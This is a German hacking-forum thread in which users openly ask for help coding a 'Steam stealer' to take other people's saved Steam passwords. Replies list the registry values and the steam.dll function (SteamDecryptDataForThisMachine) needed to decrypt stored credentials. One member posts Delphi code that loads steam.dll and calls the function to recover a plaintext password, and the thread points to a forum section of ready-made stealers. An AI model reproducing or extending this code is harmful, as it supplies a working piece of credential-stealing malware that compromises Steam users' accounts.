Steam Stealer Hilfe

[ghosty]

Hey, ich wollt mal fragen was es mit SteamDecryptDataForThisMachine auf sich hat^^
Möchte nen Steam Stealer coden aber weiß einfach nicht wie ich das Passwort decrypten kann. Also ich kann bisher nur die Namen und die 40 Zeichen nach dem wort "Pharse" auslesen.
Also was benötige ich denn da noch um das Passwort zu bekommen?

[PCFX]

Normalerweise benötigt man folgende Werte:

- Hash (war der nich 92 Stellen nach "Phrase"?)
- Username (nicht zum entschlüsseln notwendig)
- ProductID
- MachineGuid
- IO

Die letzten 3 Werte muss man aus der Registry auslesen, die Pfade sind aber je nach OS unterschiedlich glaube ich.

[Sawyer]

Naja es ist einfacher den Hash mittels der bereits erwähnten "SteamDecryptDataForThisMachine" Funktion innerhalb der Steam.dll zu Decrypten

MfG

[_florian15]

kann mir jemand eienen link von eiinen steam stealer geben
aba bitte keine virus und trojaner^^
nen link bitte

[ghosty]

kann mir jemand eienen link von eiinen steam stealer geben
aba bitte keine virus und trojaner^^
nen link bitte

Meinst du jetzt nen Source oder fertigen Stealer?
Wenn du nen fertigen Stealer meinst, würde ich dir empfehlen mal in die Stealer Section zu schauen.....


#######

@ThePapst
Könnteste bissel erklären wie das funktioniert?
Habe bei Google nicht wirklich was brauchbares gefunden.

[_florian15]

Meinst du jetzt nen Source oder fertigen Stealer?
Wenn du nen fertigen Stealer meinst, würde ich dir empfehlen mal in die Stealer Section zu schauen.....


#######

@ThePapst
Könnteste bissel erklären wie das funktioniert?
Habe bei Google nicht wirklich was brauchbares gefunden.

ja was eben am sichersten und am einfachsten is wär ur nett!

[PCFX]

@_florian15: Dir wurde deine Frage doch schon beantwortet, schau in der Toolz -> Stealer Section nach und les dich etwas in die Materie ein. Zeig Fleiß, dann wird dir auch geholfen, wenn du wo hängst.

[Hamtaro]

Die steam.dll exportiert eine Funktion namens "SteamDecryptDataForThisMachine", diese Funktion wird von Steam intern genutzt um die PWs zu entschlüsseln.
Es ist übrigens eine cdecl Funktion.
Die Funktion erwartet als ersten Parameter einen AnsiString, der das verschlüsselte PW enthalten sollte.
Der zweite Parameter ist vom Typ Integer und enthält die Länge des verschlüsselten PWs.
der dritte Parameter ist ein Pointer dahin, wo das entschlüsselte PW gespeichert werden soll.
der vierte ist ein Pointer auf einen Integer und enthält die Länge des Buffers.
Rückgabewert ist ein Integer, falls das Ergebnis 0 ist, ist alles glattgelaufen.

[ghosty]

Ist vlt ne Dumme Frage aber hat vlt jemand nen Src, weiß wirklich net wie ich das machn muss.

[Hamtaro]

Also erstmal unterstützt VB6 "von Haus aus" kein Cdecl, vielleicht kann ThunderVb dir da helfen, sonst importierst du halt die Funktion mit GetProcAddress und rufst sie auf.
Hier mal ein kleiner Delphicode von mir:

Code:

type
TSteamDecryptDataForThisMachine = function(EncryptedData :Pchar; EncryptedDataLength : Integer; DecryptedBuffer : Pointer; DecryptedBufferSize : Integer; DecryptedDataSize : PUINT) : Integer; cdecl;

procedure TForm1.Button1Click(Sender: TObject);
var
pwdecrypt : TSteamDecryptDataForThisMachine;
encpwd : Pchar;
retlength : UINT;
password : array[0..99] of char;
begin
encpwd := '093760711C24A4FCB63F19FBA07DF366A7EF01751E1D21F70BBF32F47FD4E06E17D91449DA9396CA8D2B257FF4B1';
pwdecrypt := GetProcAddress(LoadLibrary('C:\Program Files\Steam\steam.dll'),'SteamDecryptDataForThisMachine');
Showmessage(IntToStr(pwdecrypt(encpwd, strlen(encpwd),@password, sizeof(password),@retlength)));

showmessage(password);